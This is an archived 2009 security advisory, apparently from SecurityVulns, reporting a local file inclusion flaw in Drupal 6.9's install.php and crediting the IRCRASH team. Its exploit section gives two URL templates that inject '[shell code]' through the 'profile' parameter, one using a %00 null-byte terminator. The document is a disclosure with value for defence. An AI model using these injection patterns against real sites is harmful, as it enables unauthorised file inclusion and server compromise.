LFI in Drupal CMS

2009-02-10T00:00:00
ID SECURITYVULNS:DOC:21326
Type securityvulns
Reporter Securityvulns
Modified 2009-02-10T00:00:00

Description

Author : Rasool Nasr


Discovered by : Rasool Nasr


Exploited By : Rasool Nasr


E-Mail : rasool.nasr@gmail.com


WebSite : http://ircrash.com


Our Team : ircrash


IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr


CMS: Drupal ( Version 6.9 )

Download CMS : http://ftp.drupal.org/files/projects/drupal-6.9.tar.gz


LFI

Exploit :

http://[sitename]/drupal/install.php?profile=[shell code]

or

http://[sitename]/drupal/install.php?profile=[shell code]%00